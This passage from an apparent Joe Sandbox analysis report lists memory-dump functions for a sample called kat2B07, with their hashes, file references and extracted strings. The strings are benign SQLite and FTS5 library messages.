                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [%!g,%!g],$[%!g,%!g]]
                                                                • API String ID: 0-3388633204
                                                                • Opcode ID: 69e178751777e398ebc402bd035c5df9b54ef74199865fca9e40c8981b68e5ec
                                                                • Instruction ID: e86042d1e3fdcca8370f22d5860e4f24a3371b2719c1a3c2157855856007c472
                                                                • Opcode Fuzzy Hash: 69e178751777e398ebc402bd035c5df9b54ef74199865fca9e40c8981b68e5ec
                                                                • Instruction Fuzzy Hash: A1513670904702ABD700DF29DCC4B6BB7B4BF42362F00466EF8499B252E775A585CBA3
                                                                Strings
                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1D75F33F
                                                                • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1D75F418
                                                                • malformed inverted index for FTS%d table %s.%s, xrefs: 1D75F3F3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                                • API String ID: 0-2809892521
                                                                • Opcode ID: f762ee03d29d209513785b2a7acdfe36a852a20a25df333e644c3dee0bbaba09
                                                                • Instruction ID: 1f8678d974bafd16c6efbd60b1934a98687968ebba5083566ee72469504d0257
                                                                • Opcode Fuzzy Hash: f762ee03d29d209513785b2a7acdfe36a852a20a25df333e644c3dee0bbaba09
                                                                • Instruction Fuzzy Hash: BE41F472909221EFE7109B24EC88B6B7778EF422A5F04466AFC05C6211D735A155CFB3
                                                                Strings
                                                                • misuse, xrefs: 1D766E62
                                                                • API call with %s database connection pointer, xrefs: 1D766E4C
                                                                • %s at line %d of [%.10s], xrefs: 1D766E67
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766E58
                                                                • invalid, xrefs: 1D766E47
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                • API String ID: 0-3670841456
                                                                • Opcode ID: a67ec748fa271b560ca4a2e4f601642186ab1022196414254ab4d53c98bcb47f
                                                                • Instruction ID: b23b3cd7b22830f17affdb11fe565ea5ae381fb9ae9ded5f963738bbff08cb50
                                                                • Opcode Fuzzy Hash: a67ec748fa271b560ca4a2e4f601642186ab1022196414254ab4d53c98bcb47f
                                                                • Instruction Fuzzy Hash: 48F0A738A44584EBFB04A508DD81BFE3B563BC0B1AFD040DEEA545F197E21A5443D253
                                                                Strings
                                                                • misuse, xrefs: 1D766EE5
                                                                • API call with %s database connection pointer, xrefs: 1D766ECF
                                                                • %s at line %d of [%.10s], xrefs: 1D766EEA
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766EDB
                                                                • invalid, xrefs: 1D766ECA
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                • API String ID: 0-3670841456
                                                                • Opcode ID: 21a3bf99b909ebb98bcd87dc229033633e290e30c89f65e79dc0390a08c7f3e6
                                                                • Instruction ID: 1d78bdd8b66d473de5c9cb34d37473ccb0a105a681a53ae596af0d175e510ab9
                                                                • Opcode Fuzzy Hash: 21a3bf99b909ebb98bcd87dc229033633e290e30c89f65e79dc0390a08c7f3e6
                                                                • Instruction Fuzzy Hash: 9CF03024B04984EBFB10A554DD61FFB268627C0727FD550EEFA545B1E3F6289450C213
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aaa7e8f5e0dea767bcb533e20a73e10bef618a469ec5593a0ee1b36bba5c0d90
                                                                • Instruction ID: f1d3ac25a4f5d4a7a482a96523462c32873ff1a01c0556dcedf477cb30233db2
                                                                • Opcode Fuzzy Hash: aaa7e8f5e0dea767bcb533e20a73e10bef618a469ec5593a0ee1b36bba5c0d90
                                                                • Instruction Fuzzy Hash: 2E51637660C200BFD740EB68FC44EAB7BE2AF85321F0A45A8F158872B1E631DD51DB52
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78cb13aa54ac7b856c2cb538a5d6947577827f5209ed72190ff53353e9c67b2c
                                                                • Instruction ID: 9cc401876ba7daee331b449f05300c80f29a65b539473004894f8e5a6c17f53c
                                                                • Opcode Fuzzy Hash: 78cb13aa54ac7b856c2cb538a5d6947577827f5209ed72190ff53353e9c67b2c
                                                                • Instruction Fuzzy Hash: 511133B98082007FD705AB20FC41E7B77B9EF81221F458569F90987232E736E908C2A3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                • Instruction ID: 5049e0f7355e162562a8f2d8c961f2a6926f9fe501d18d2307d9fa122fb77b56
                                                                • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                • Instruction Fuzzy Hash: 1DB1A2B5A04602ABC704DF28DC8066AF7E9FF88264F49463EF949D3711E735E914CB92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a361d8be97efc800043839f664a951d2827f3100fe8f975daebbc7d2cb9b10b3
                                                                • Instruction ID: eb4fdce118549ec4ca1deb36cd8f682934b2f70ec8dc02c73c687e2de62eed40
                                                                • Opcode Fuzzy Hash: a361d8be97efc800043839f664a951d2827f3100fe8f975daebbc7d2cb9b10b3
                                                                • Instruction Fuzzy Hash: C5A13871A0C3518FC706CF28C89166AFBE1AF85234F258E6EF89997352E331D9448B53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                                • API String ID: 0-2679805236
                                                                • Opcode ID: c639cd0dcbb7478e3395bb60fca54d9f510fe517ab2c7d9bae9237e3d14c3634
                                                                • Instruction ID: eb3084a7e20e510ecb5ca39b78152419816a9feba91df172df09e92b937287ff
                                                                • Opcode Fuzzy Hash: c639cd0dcbb7478e3395bb60fca54d9f510fe517ab2c7d9bae9237e3d14c3634
                                                                • Instruction Fuzzy Hash: D471E271A083468FC701CF28CC84A6AB7E4FF85264F15866EE859D7611EB35F905CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                • API String ID: 0-3864549341
                                                                • Opcode ID: 6c9932e1ded3932ef0d73a74b2eb98b58f4cb9847dc2ce920a6610701423a2fd
                                                                • Instruction ID: dd740fcc2939817be14b669b93dcc91239871d38cffc77e9adbde455cfe66bce
                                                                • Opcode Fuzzy Hash: 6c9932e1ded3932ef0d73a74b2eb98b58f4cb9847dc2ce920a6610701423a2fd
                                                                • Instruction Fuzzy Hash: 5A6169B6600B59BBE7028F24CC49BA777A8AF41704F25C52CF91997282E7B5E15087E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: col$fts5vocab: unknown table type: %Q$instance$row
                                                                • API String ID: 0-195232091
                                                                • Opcode ID: 857aa26174cd9021db5ebb6979cbdb96c6011fe427cf03dbab97dac629f3089f
                                                                • Instruction ID: 0ecc21eea7fc73fc4d4de10dbad954e04cefb6a3b85c434e4bf785f65f114fc1
                                                                • Opcode Fuzzy Hash: 857aa26174cd9021db5ebb6979cbdb96c6011fe427cf03dbab97dac629f3089f
                                                                • Instruction Fuzzy Hash: 8C611974909B219BC7409F24DCC47AA37B4BB422AEF05023AED46DB201E735A515CFA7
                                                                Strings
                                                                • cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1D760B3B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
                                                                • API String ID: 0-2869280805
                                                                • Opcode ID: 91bc72156e2f6ae956cb9ca2e3145fa33d6d2c1bd0a9956c327a239e8eb1f4b8
                                                                • Instruction ID: 924ac3ccb8d6de398a07c50822a7ad7d09033b892d42ed0679ca1d0a4d1ad9ef
                                                                • Opcode Fuzzy Hash: 91bc72156e2f6ae956cb9ca2e3145fa33d6d2c1bd0a9956c327a239e8eb1f4b8
                                                                • Instruction Fuzzy Hash: 5941B2BA605311AFE7119F58EC80966F3B4FF84275B00457AFA4887721F772E854C7A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                • API String ID: 0-131617836
                                                                • Opcode ID: 5a5bf1ff3de6d29621a2ca0fb87439f63b3ecc0ce472c7f0f8a70bd532a2ae74
                                                                • Instruction ID: 3eaaa85176dc7f81f534674c57d1cbbe882c9f39c05d291f9ba3211e14db21e7
                                                                • Opcode Fuzzy Hash: 5a5bf1ff3de6d29621a2ca0fb87439f63b3ecc0ce472c7f0f8a70bd532a2ae74
                                                                • Instruction Fuzzy Hash: 6D51027AB042868BD300DF14D48077AB7B1BB42238FD542ADE84E5F641D732EC868B53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: main$rbu_memory
                                                                • API String ID: 0-3973752345
                                                                • Opcode ID: f630f65dbfcde74daeaece9f061e18b836871f566b7d09deffff8850bf5841bd
                                                                • Instruction ID: 908751d12824e6b14c6501327149eda6bd9a4bd88711460f1d70f84c3246c85b
                                                                • Opcode Fuzzy Hash: f630f65dbfcde74daeaece9f061e18b836871f566b7d09deffff8850bf5841bd
                                                                • Instruction Fuzzy Hash: 5251EF757083019FDB008F69E884B6AB7E8AF85266F01826EED45D7711DB35E805CBA3
                                                                Strings
                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1D748D35
                                                                • winAccess, xrefs: 1D748D60
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
